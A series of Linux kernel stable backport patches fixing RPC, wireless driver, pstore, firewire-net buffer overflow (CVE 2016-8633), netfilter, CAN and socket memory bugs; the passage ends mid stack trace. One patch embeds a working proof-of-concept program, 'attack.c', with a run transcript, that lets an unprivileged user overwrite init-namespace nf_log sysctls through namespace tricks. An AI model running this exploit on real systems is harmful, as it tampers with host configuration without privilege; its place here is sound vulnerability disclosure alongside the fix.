Chuck Lever Date: Wed, 29 Jun 2016 13:55:14 -0400 Subject: [PATCH 245/315] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply commit 0533b13072f4bf35738290d2cf9e299c7bc6c42a upstream. If an RPC program does not set vs_dispatch and pc_func() returns rpc_drop_reply, the server sends a reply anyway containing a single word containing the value RPC_DROP_REPLY (in network byte-order, of course). This is a nonsense RPC message. Fixes: 9e701c610923 ("svcrpc: simpler request dropping") Signed-off-by: Chuck Lever Tested-by: Steve Wise Signed-off-by: Anna Schumaker Signed-off-by: Willy Tarreau --- net/sunrpc/svc.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c index 6dee8fbb3b1..c996a71fc9f 100644 --- a/net/sunrpc/svc.c +++ b/net/sunrpc/svc.c @@ -1182,7 +1182,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv) *statp = procp->pc_func(rqstp, rqstp->rq_argp, rqstp->rq_resp); /* Encode reply */ - if (rqstp->rq_dropme) { + if (*statp == rpc_drop_reply || + rqstp->rq_dropme) { if (procp->pc_release) procp->pc_release(rqstp, NULL, rqstp->rq_resp); goto dropit; From 5e26453d0fcb7d715592e438fb8883ef0c2d2dbf Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 18 Jul 2016 16:24:35 -0700 Subject: [PATCH 246/315] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill commit 5c5fa1f464ac954982df1d96b9f9a5103d21aedd upstream. In case dma_mapping_error() returns an error in dma_rxfill, we would be leaking a packet that we allocated with brcmu_pkt_buf_get_skb(). Reported-by: coverity (CID 1081819) Fixes: 67d0cf50bd32 ("brcmsmac: Fix WARNING caused by lack of calls to dma_mapping_error()") Signed-off-by: Florian Fainelli Acked-by: Arend van Spriel Signed-off-by: Kalle Valo Signed-off-by: Willy Tarreau --- drivers/net/wireless/brcm80211/brcmsmac/dma.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/brcm80211/brcmsmac/dma.c b/drivers/net/wireless/brcm80211/brcmsmac/dma.c index 4fb9635d391..7660b523dcf 100644 --- a/drivers/net/wireless/brcm80211/brcmsmac/dma.c +++ b/drivers/net/wireless/brcm80211/brcmsmac/dma.c @@ -1079,8 +1079,10 @@ bool dma_rxfill(struct dma_pub *pub) pa = dma_map_single(di->dmadev, p->data, di->rxbufsize, DMA_FROM_DEVICE); - if (dma_mapping_error(di->dmadev, pa)) + if (dma_mapping_error(di->dmadev, pa)) { + brcmu_pkt_buf_free_skb(p); return false; + } /* save the free packet pointer */ di->rxp[rxout] = p; From 3e56d9852d8b7e3c5d26d3a872795af523d7a2d8 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 18 Jul 2016 16:24:37 -0700 Subject: [PATCH 247/315] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() commit f823a2aa8f4674c095a5413b9e3ba12d82df06f2 upstream. wlc_phy_txpower_get_current() does a logical OR of power->flags, which presumes that power.flags was initiliazed earlier by the caller, unfortunately, this is not the case, so make sure we zero out the struct tx_power before calling into wlc_phy_txpower_get_current(). Reported-by: coverity (CID 146011) Fixes: 5b435de0d7868 ("net: wireless: add brcm80211 drivers") Signed-off-by: Florian Fainelli Acked-by: Arend van Spriel Signed-off-by: Kalle Valo Signed-off-by: Willy Tarreau --- drivers/net/wireless/brcm80211/brcmsmac/stf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/brcm80211/brcmsmac/stf.c b/drivers/net/wireless/brcm80211/brcmsmac/stf.c index dd916272249..0ab865de149 100644 --- a/drivers/net/wireless/brcm80211/brcmsmac/stf.c +++ b/drivers/net/wireless/brcm80211/brcmsmac/stf.c @@ -87,7 +87,7 @@ void brcms_c_stf_ss_algo_channel_get(struct brcms_c_info *wlc, u16 *ss_algo_channel, u16 chanspec) { - struct tx_power power; + struct tx_power power = { }; u8 siso_mcs_id, cdd_mcs_id, stbc_mcs_id; /* Clear previous settings */ From ec38771b3fe78a386577905bbbd71b1bf8bde860 Mon Sep 17 00:00:00 2001 From: Arend Van Spriel Date: Mon, 5 Sep 2016 10:45:47 +0100 Subject: [PATCH 248/315] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() commit ded89912156b1a47d940a0c954c43afbabd0c42c upstream. User-space can choose to omit NL80211_ATTR_SSID and only provide raw IE TLV data. When doing so it can provide SSID IE with length exceeding the allowed size. The driver further processes this IE copying it into a local variable without checking the length. Hence stack can be corrupted and used as exploit. Reported-by: Daxing Guo Reviewed-by: Hante Meuleman Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo Signed-off-by: Willy Tarreau --- drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c index 301e572e892..2c524305589 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c @@ -3726,7 +3726,7 @@ brcmf_cfg80211_start_ap(struct wiphy *wiphy, struct net_device *ndev, (u8 *)&settings->beacon.head[ie_offset], settings->beacon.head_len - ie_offset, WLAN_EID_SSID); - if (!ssid_ie) + if (!ssid_ie || ssid_ie->len > IEEE80211_MAX_SSID_LEN) return -EINVAL; memcpy(ssid_le.SSID, ssid_ie->data, ssid_ie->len); From 3a8930fd9cbb0e7cc1ea0a8a4a75920220e036ad Mon Sep 17 00:00:00 2001 From: Liu ShuoX Date: Wed, 12 Mar 2014 21:24:44 +0800 Subject: [PATCH 249/315] pstore: Fix buffer overflow while write offset equal to buffer size commit 017321cf390045dd4c4afc4a232995ea50bcf66d upstream. In case new offset is equal to prz->buffer_size, it won't wrap at this time and will return old(overflow) value next time. Signed-off-by: Liu ShuoX Acked-by: Kees Cook Signed-off-by: Tony Luck Signed-off-by: Willy Tarreau --- fs/pstore/ram_core.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c index bda61a759b6..0b367ef7a7d 100644 --- a/fs/pstore/ram_core.c +++ b/fs/pstore/ram_core.c @@ -54,7 +54,7 @@ static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a) do { old = atomic_read(&prz->buffer->start); new = old + a; - while (unlikely(new > prz->buffer_size)) + while (unlikely(new >= prz->buffer_size)) new -= prz->buffer_size; } while (atomic_cmpxchg(&prz->buffer->start, old, new) != old); @@ -91,7 +91,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a) old = atomic_read(&prz->buffer->start); new = old + a; - while (unlikely(new > prz->buffer_size)) + while (unlikely(new >= prz->buffer_size)) new -= prz->buffer_size; atomic_set(&prz->buffer->start, new); From afe6ced9adca522e8f5e8e64175257d421ba99f5 Mon Sep 17 00:00:00 2001 From: Jack Morgenstein Date: Wed, 2 Mar 2016 17:47:46 +0200 Subject: [PATCH 250/315] net/mlx4_core: Allow resetting VF admin mac to zero commit 6e5224224faa50ec4c8949dcefadf895e565f0d1 upstream. The VF administrative mac addresses (stored in the PF driver) are initialized to zero when the PF driver starts up. These addresses may be modified in the PF driver through ndo calls initiated by iproute2 or libvirt. While we allow the PF/host to change the VF admin mac address from zero to a valid unicast mac, we do not allow restoring the VF admin mac to zero. We currently only allow changing this mac to a different unicast mac. This leads to problems when libvirt scripts are used to deal with VF mac addresses, and libvirt attempts to revoke the mac so this host will not use it anymore. Fix this by allowing resetting a VF administrative MAC back to zero. Fixes: 8f7ba3ca12f6 ('net/mlx4: Add set VF mac address support') Signed-off-by: Jack Morgenstein Reported-by: Moshe Levi Signed-off-by: David S. Miller Signed-off-by: Juerg Haefliger Signed-off-by: Willy Tarreau --- drivers/net/ethernet/mellanox/mlx4/en_netdev.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c index 063f3f4d486..a206ce615e9 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c @@ -2027,7 +2027,7 @@ static int mlx4_en_set_vf_mac(struct net_device *dev, int queue, u8 *mac) struct mlx4_en_dev *mdev = en_priv->mdev; u64 mac_u64 = mlx4_en_mac_to_u64(mac); - if (!is_valid_ether_addr(mac)) + if (is_multicast_ether_addr(mac)) return -EINVAL; return mlx4_set_vf_mac(mdev->dev, en_priv->port, queue, mac_u64); From 1d4353bd493f62889983bd712086b09235a44c25 Mon Sep 17 00:00:00 2001 From: Stefan Richter Date: Sat, 29 Oct 2016 21:28:18 +0200 Subject: [PATCH 251/315] firewire: net: guard against rx buffer overflows commit 667121ace9dbafb368618dbabcf07901c962ddac upstream. The IP-over-1394 driver firewire-net lacked input validation when handling incoming fragmented datagrams. A maliciously formed fragment with a respectively large datagram_offset would cause a memcpy past the datagram buffer. So, drop any packets carrying a fragment with offset + length larger than datagram_size. In addition, ensure that - GASP header, unfragmented encapsulation header, or fragment encapsulation header actually exists before we access it, - the encapsulated datagram or fragment is of nonzero size. Reported-by: Eyal Itkin Reviewed-by: Eyal Itkin Fixes: CVE 2016-8633 Signed-off-by: Stefan Richter Signed-off-by: Willy Tarreau --- drivers/firewire/net.c | 51 +++++++++++++++++++++++++++++------------- 1 file changed, 35 insertions(+), 16 deletions(-) diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c index 7bdb6fe6323..70a716eab3f 100644 --- a/drivers/firewire/net.c +++ b/drivers/firewire/net.c @@ -591,6 +591,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len, int retval; u16 ether_type; + if (len <= RFC2374_UNFRAG_HDR_SIZE) + return 0; + hdr.w0 = be32_to_cpu(buf[0]); lf = fwnet_get_hdr_lf(&hdr); if (lf == RFC2374_HDR_UNFRAG) { @@ -615,7 +618,12 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len, return fwnet_finish_incoming_packet(net, skb, source_node_id, is_broadcast, ether_type); } + /* A datagram fragment has been received, now the fun begins. */ + + if (len <= RFC2374_FRAG_HDR_SIZE) + return 0; + hdr.w1 = ntohl(buf[1]); buf += 2; len -= RFC2374_FRAG_HDR_SIZE; @@ -629,6 +637,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len, datagram_label = fwnet_get_hdr_dgl(&hdr); dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */ + if (fg_off + len > dg_size) + return 0; + spin_lock_irqsave(&dev->lock, flags); peer = fwnet_peer_find_by_node_id(dev, source_node_id, generation); @@ -735,6 +746,22 @@ static void fwnet_receive_packet(struct fw_card *card, struct fw_request *r, fw_send_response(card, r, rcode); } +static int gasp_source_id(__be32 *p) +{ + return be32_to_cpu(p[0]) >> 16; +} + +static u32 gasp_specifier_id(__be32 *p) +{ + return (be32_to_cpu(p[0]) & 0xffff) << 8 | + (be32_to_cpu(p[1]) & 0xff000000) >> 24; +} + +static u32 gasp_version(__be32 *p) +{ + return be32_to_cpu(p[1]) & 0xffffff; +} + static void fwnet_receive_broadcast(struct fw_iso_context *context, u32 cycle, size_t header_length, void *header, void *data) { @@ -744,9 +771,6 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context, __be32 *buf_ptr; int retval; u32 length; - u16 source_node_id; - u32 specifier_id; - u32 ver; unsigned long offset; unsigned long flags; @@ -763,22 +787,17 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context, spin_unlock_irqrestore(&dev->lock, flags); - specifier_id = (be32_to_cpu(buf_ptr[0]) & 0xffff) << 8 - | (be32_to_cpu(buf_ptr[1]) & 0xff000000) >> 24; - ver = be32_to_cpu(buf_ptr[1]) & 0xffffff; - source_node_id = be32_to_cpu(buf_ptr[0]) >> 16; - - if (specifier_id == IANA_SPECIFIER_ID && - (ver == RFC2734_SW_VERSION + if (length > IEEE1394_GASP_HDR_SIZE && + gasp_specifier_id(buf_ptr) == IANA_SPECIFIER_ID && + (gasp_version(buf_ptr) == RFC2734_SW_VERSION #if IS_ENABLED(CONFIG_IPV6) - || ver == RFC3146_SW_VERSION + || gasp_version(buf_ptr) == RFC3146_SW_VERSION #endif - )) { - buf_ptr += 2; - length -= IEEE1394_GASP_HDR_SIZE; - fwnet_incoming_packet(dev, buf_ptr, length, source_node_id, + )) + fwnet_incoming_packet(dev, buf_ptr + 2, + length - IEEE1394_GASP_HDR_SIZE, + gasp_source_id(buf_ptr), context->card->generation, true); - } packet.payload_length = dev->rcv_buffer_size; packet.interrupt = 1; From 3ca5f4958d9f97dd87ac1e19dbc0fb7e887fd199 Mon Sep 17 00:00:00 2001 From: Stefan Richter Date: Sun, 30 Oct 2016 17:32:01 +0100 Subject: [PATCH 252/315] firewire: net: fix fragmented datagram_size off-by-one commit e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream. RFC 2734 defines the datagram_size field in fragment encapsulation headers thus: datagram_size: The encoded size of the entire IP datagram. The value of datagram_size [...] SHALL be one less than the value of Total Length in the datagram's IP header (see STD 5, RFC 791). Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got this field with a -/+1 offset: ether1394_tx() /* transmit */ ether1394_encapsulate_prep() hdr->ff.dg_size = dg_size - 1; ether1394_data_handler() /* receive */ if (hdr->common.lf == ETH1394_HDR_LF_FF) dg_size = hdr->ff.dg_size + 1; else dg_size = hdr->sf.dg_size + 1; Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500 byte sized datagrams in fragments with datagram_size=1499 if link fragmentation is required. Only firewire-net sets and gets datagram_size without this offset. The result is lacking interoperability of firewire-net with OS X, Windows XP, and presumably Linux' eth1394. (I did not test with the latter.) For example, FTP data transfers to a Linux firewire-net box with max_rec smaller than the 1500 bytes MTU - from OS X fail entirely, - from Win XP start out with a bunch of fragmented datagrams which time out, then continue with unfragmented datagrams because Win XP temporarily reduces the MTU to 576 bytes. So let's fix firewire-net's datagram_size accessors. Note that firewire-net thereby loses interoperability with unpatched firewire-net, but only if link fragmentation is employed. (This happens with large broadcast datagrams, and with large datagrams on several FireWire CardBus cards with smaller max_rec than equivalent PCI cards, and it can be worked around by setting a small enough MTU.) Signed-off-by: Stefan Richter Signed-off-by: Willy Tarreau --- drivers/firewire/net.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c index 70a716eab3f..132131934c7 100644 --- a/drivers/firewire/net.c +++ b/drivers/firewire/net.c @@ -73,13 +73,13 @@ struct rfc2734_header { #define fwnet_get_hdr_lf(h) (((h)->w0 & 0xc0000000) >> 30) #define fwnet_get_hdr_ether_type(h) (((h)->w0 & 0x0000ffff)) -#define fwnet_get_hdr_dg_size(h) (((h)->w0 & 0x0fff0000) >> 16) +#define fwnet_get_hdr_dg_size(h) ((((h)->w0 & 0x0fff0000) >> 16) + 1) #define fwnet_get_hdr_fg_off(h) (((h)->w0 & 0x00000fff)) #define fwnet_get_hdr_dgl(h) (((h)->w1 & 0xffff0000) >> 16) -#define fwnet_set_hdr_lf(lf) ((lf) << 30) +#define fwnet_set_hdr_lf(lf) ((lf) << 30) #define fwnet_set_hdr_ether_type(et) (et) -#define fwnet_set_hdr_dg_size(dgs) ((dgs) << 16) +#define fwnet_set_hdr_dg_size(dgs) (((dgs) - 1) << 16) #define fwnet_set_hdr_fg_off(fgo) (fgo) #define fwnet_set_hdr_dgl(dgl) ((dgl) << 16) @@ -635,7 +635,7 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len, fg_off = fwnet_get_hdr_fg_off(&hdr); } datagram_label = fwnet_get_hdr_dgl(&hdr); - dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */ + dg_size = fwnet_get_hdr_dg_size(&hdr); if (fg_off + len > dg_size) return 0; From b53cc178e2a88c7f10213269ba111bda4d4a77b7 Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Sun, 18 Sep 2016 21:40:55 +0200 Subject: [PATCH 253/315] netfilter: fix namespace handling in nf_log_proc_dostring commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream. nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn Signed-off-by: Pablo Neira Ayuso Signed-off-by: Willy Tarreau --- net/netfilter/nf_log.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c index 3b18dd1be7d..07ed65af05a 100644 --- a/net/netfilter/nf_log.c +++ b/net/netfilter/nf_log.c @@ -253,7 +253,7 @@ static int nf_log_proc_dostring(ctl_table *table, int write, size_t size = *lenp; int r = 0; int tindex = (unsigned long)table->extra1; - struct net *net = current->nsproxy->net_ns; + struct net *net = table->extra2; if (write) { if (size > sizeof(buf)) @@ -306,7 +306,6 @@ static int netfilter_log_sysctl_init(struct net *net) 3, "%d", i); nf_log_sysctl_table[i].procname = nf_log_sysctl_fnames[i]; - nf_log_sysctl_table[i].data = NULL; nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN * sizeof(char); nf_log_sysctl_table[i].mode = 0644; @@ -317,6 +316,9 @@ static int netfilter_log_sysctl_init(struct net *net) } } + for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++) + table[i].extra2 = net; + net->nf.nf_log_dir_header = register_net_sysctl(net, "net/netfilter/nf_log", table); From 4c1307b232a55552e69cb1a367cc6f97a4991f62 Mon Sep 17 00:00:00 2001 From: Oliver Hartkopp Date: Mon, 24 Oct 2016 21:11:26 +0200 Subject: [PATCH 254/315] can: bcm: fix warning in bcm_connect/proc_register commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream. Andrey Konovalov reported an issue with proc_register in bcm.c. As suggested by Cong Wang this patch adds a lock_sock() protection and a check for unsuccessful proc_create_data() in bcm_connect(). Reference: http://marc.info/?l=linux-netdev&m=147732648731237 Reported-by: Andrey Konovalov Suggested-by: Cong Wang Signed-off-by: Oliver Hartkopp Acked-by: Cong Wang Tested-by: Andrey Konovalov Signed-off-by: Marc Kleine-Budde Signed-off-by: Willy Tarreau --- net/can/bcm.c | 32 +++++++++++++++++++++++--------- 1 file changed, 23 insertions(+), 9 deletions(-) diff --git a/net/can/bcm.c b/net/can/bcm.c index 35cf02d9276..dd0781c49eb 100644 --- a/net/can/bcm.c +++ b/net/can/bcm.c @@ -1500,24 +1500,31 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len, struct sockaddr_can *addr = (struct sockaddr_can *)uaddr; struct sock *sk = sock->sk; struct bcm_sock *bo = bcm_sk(sk); + int ret = 0; if (len < sizeof(*addr)) return -EINVAL; - if (bo->bound) - return -EISCONN; + lock_sock(sk); + + if (bo->bound) { + ret = -EISCONN; + goto fail; + } /* bind a device to this socket */ if (addr->can_ifindex) { struct net_device *dev; dev = dev_get_by_index(&init_net, addr->can_ifindex); - if (!dev) - return -ENODEV; - + if (!dev) { + ret = -ENODEV; + goto fail; + } if (dev->type != ARPHRD_CAN) { dev_put(dev); - return -ENODEV; + ret = -ENODEV; + goto fail; } bo->ifindex = dev->ifindex; @@ -1528,17 +1535,24 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len, bo->ifindex = 0; } - bo->bound = 1; - if (proc_dir) { /* unique socket address as filename */ sprintf(bo->procname, "%lu", sock_i_ino(sk)); bo->bcm_proc_read = proc_create_data(bo->procname, 0644, proc_dir, &bcm_proc_fops, sk); + if (!bo->bcm_proc_read) { + ret = -ENOMEM; + goto fail; + } } - return 0; + bo->bound = 1; + +fail: + release_sock(sk); + + return ret; } static int bcm_recvmsg(struct kiocb *iocb, struct socket *sock, From a5b79829a441e6240b56f589c0fb003876b30126 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Fri, 15 May 2015 12:39:25 -0700 Subject: [PATCH 255/315] net: fix sk_mem_reclaim_partial() commit 1a24e04e4b50939daa3041682b38b82c896ca438 upstream. sk_mem_reclaim_partial() goal is to ensure each socket has one SK_MEM_QUANTUM forward allocation. This is needed both for performance and better handling of memory pressure situations in follow up patches. SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes as some arches have 64KB pages. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/net/sock.h | 6 +++--- net/core/sock.c | 9 +++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/include/net/sock.h b/include/net/sock.h index 2317d122874..6d2fbacdc92 100644 --- a/include/net/sock.h +++ b/include/net/sock.h @@ -1358,7 +1358,7 @@ static inline struct inode *SOCK_INODE(struct socket *socket) * Functions for memory accounting */ extern int __sk_mem_schedule(struct sock *sk, int size, int kind); -extern void __sk_mem_reclaim(struct sock *sk); +void __sk_mem_reclaim(struct sock *sk, int amount); #define SK_MEM_QUANTUM ((int)PAGE_SIZE) #define SK_MEM_QUANTUM_SHIFT ilog2(SK_MEM_QUANTUM) @@ -1399,7 +1399,7 @@ static inline void sk_mem_reclaim(struct sock *sk) if (!sk_has_account(sk)) return; if (sk->sk_forward_alloc >= SK_MEM_QUANTUM) - __sk_mem_reclaim(sk); + __sk_mem_reclaim(sk, sk->sk_forward_alloc); } static inline void sk_mem_reclaim_partial(struct sock *sk) @@ -1407,7 +1407,7 @@ static inline void sk_mem_reclaim_partial(struct sock *sk) if (!sk_has_account(sk)) return; if (sk->sk_forward_alloc > SK_MEM_QUANTUM) - __sk_mem_reclaim(sk); + __sk_mem_reclaim(sk, sk->sk_forward_alloc - 1); } static inline void sk_mem_charge(struct sock *sk, int size) diff --git a/net/core/sock.c b/net/core/sock.c index 5a954fccc7d..6473fefbb2c 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -2048,12 +2048,13 @@ EXPORT_SYMBOL(__sk_mem_schedule); /** * __sk_reclaim - reclaim memory_allocated * @sk: socket + * @amount: number of bytes (rounded down to a SK_MEM_QUANTUM multiple) */ -void __sk_mem_reclaim(struct sock *sk) +void __sk_mem_reclaim(struct sock *sk, int amount) { - sk_memory_allocated_sub(sk, - sk->sk_forward_alloc >> SK_MEM_QUANTUM_SHIFT); - sk->sk_forward_alloc &= SK_MEM_QUANTUM - 1; + amount >>= SK_MEM_QUANTUM_SHIFT; + sk_memory_allocated_sub(sk, amount); + sk->sk_forward_alloc -= amount << SK_MEM_QUANTUM_SHIFT; if (sk_under_memory_pressure(sk) && (sk_memory_allocated(sk) < sk_prot_mem_limits(sk, 0))) From 9864f15313b53fa101348e0b61dbe6277805b33e Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 15 Sep 2016 08:48:46 -0700 Subject: [PATCH 256/315] net: avoid sk_forward_alloc overflows commit 20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream. A malicious TCP receiver, sending SACK, can force the sender to split skbs in write queue and increase its memory usage. Then, when socket is closed and its write queue purged, we might overflow sk_forward_alloc (It becomes negative) sk_mem_reclaim() does nothing in this case, and more than 2GB are leaked from TCP perspective (tcp_memory_allocated is not changed) Then warnings trigger from inet_sock_destruct() and sk_stream_kill_queues() seeing a not zero sk_forward_alloc All TCP stack can be stuck because TCP is under memory pressure. A simple fix is to preemptively reclaim from sk_mem_uncharge(). This makes sure a socket wont have more than 2 MB forward allocated, after burst and idle period. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/net/sock.h | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/include/net/sock.h b/include/net/sock.h index 6d2fbacdc92..a46dd30ea58 100644 --- a/include/net/sock.h +++ b/include/net/sock.h @@ -1422,6 +1422,16 @@ static inline void sk_mem_uncharge(struct sock *sk, int size) if (!sk_has_account(sk)) return; sk->sk_forward_alloc += size; + + /* Avoid a possible overflow. + * TCP send queues can make this happen, if sk_mem_reclaim() + * is not called and more than 2 GBytes are released at once. + * + * If we reach 2 MBytes, reclaim 1 MBytes right now, there is + * no need to hold that much forward allocation anyway. + */ + if (unlikely(sk->sk_forward_alloc >= 1 << 21)) + __sk_mem_reclaim(sk, 1 << 20); } static inline void sk_wmem_free_skb(struct sock *sk, struct sk_buff *skb) From 2943dca4f33d22a9e1681e7e5a20786787c4adc5 Mon Sep 17 00:00:00 2001 From: Nikolay Aleksandrov Date: Sun, 25 Sep 2016 23:08:31 +0200 Subject: [PATCH 257/315] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route commit 2cf750704bb6d7ed8c7d732e071dd1bc890ea5e8 upstream. Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid instead of the previous dst_pid which was copied from in_skb's portid. Since the skb is new the portid is 0 at that point so the packets are sent to the kernel and we get scheduling while atomic or a deadlock (depending on where it happens) by trying to acquire rtnl two times. Also since this is RTM_GETROUTE, it can be triggered by a normal user. Here's the sleeping while atomic trace: [ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620 [ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0 [ 7858.212881] 2 locks held by swapper/0/0: [ 7858.213013] #0: (((&mrt->ipmr_expire_timer))){+.-...}, at: [] call_timer_fn+0x5/0x350 [ 7858.213422] #1: (mfc_unres_lock){+.....}, at: [] ipmr_expire_process+0x25/0x130 [ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179 [ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014 [ 7858.214108] 0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000 [ 7858.214412] ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e [ 7858.214716] 000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f [ 7858.215251] Call Trace: [ 7858.215412] [] dump_stack+0x85/0xc1 [ 7858.215662] [] ___might_sleep+0x192/0x250 [ 7858.215868] [] __might_sleep+0x6f/0x100 [ 7858.216072] [] mutex_lock_nested+0x33/0x4d0 [ 7858.216279] [] ? netlink_lookup+0x25f/0x460 [ 7858.216487] [] rtnetlink_rcv+0x1b/0x40 [ 7858.216687] [] netlink_unicast+0x19c/0x260 [ 7858.216900] [] rtnl_unicast+0x20/0x30 [ 7858.217128] [] ipmr_destroy_unres+0xa9/0xf0 [ 7858.217351] [] ipmr_expire_process+0x8f/0x130 [ 7858.217581] [] ? ipmr_net_init+0x180/0x180 [ 7858.217785] [] ? ipmr_net_init+0x180/0x180 [ 7858.217990] [] call_timer_fn+0xa5/0x350 [ 7858.218192] [] ? call_timer_fn+0x5/0x350 [ 7858.218415] [] ? ipmr_net_init+0x180/0x180 [ 7858.218656] [] run_timer_softirq+0x260/0x640 [ 7858.218865] [] ? __do_softirq+0xbb/0x54f [ 7858.219068] [] __do_softirq+0xe8/0x54f [ 7858.219269] [] irq_exit+0xb8/0xc0 [ 7858.219463] [] smp_apic_timer_interrupt+0x42/0x50 [ 7858.219678] [] apic_timer_interrupt+0x8c/0xa0 [ 7858.219897] [] ? native_safe_halt+0x6/0x10 [ 7858.220165] [] ? trace_hardirqs_on+0xd/0x10 [ 7858.220373] [] default_idle+0x23/0x190 [ 7858.220574] [] arch_cpu_idle+0xf/0x20 [ 7858.220790] [] default_idle_call+0x4c/0x60 [ 7858.221016] [] cpu_startup_entry+0x39b/0x4d0 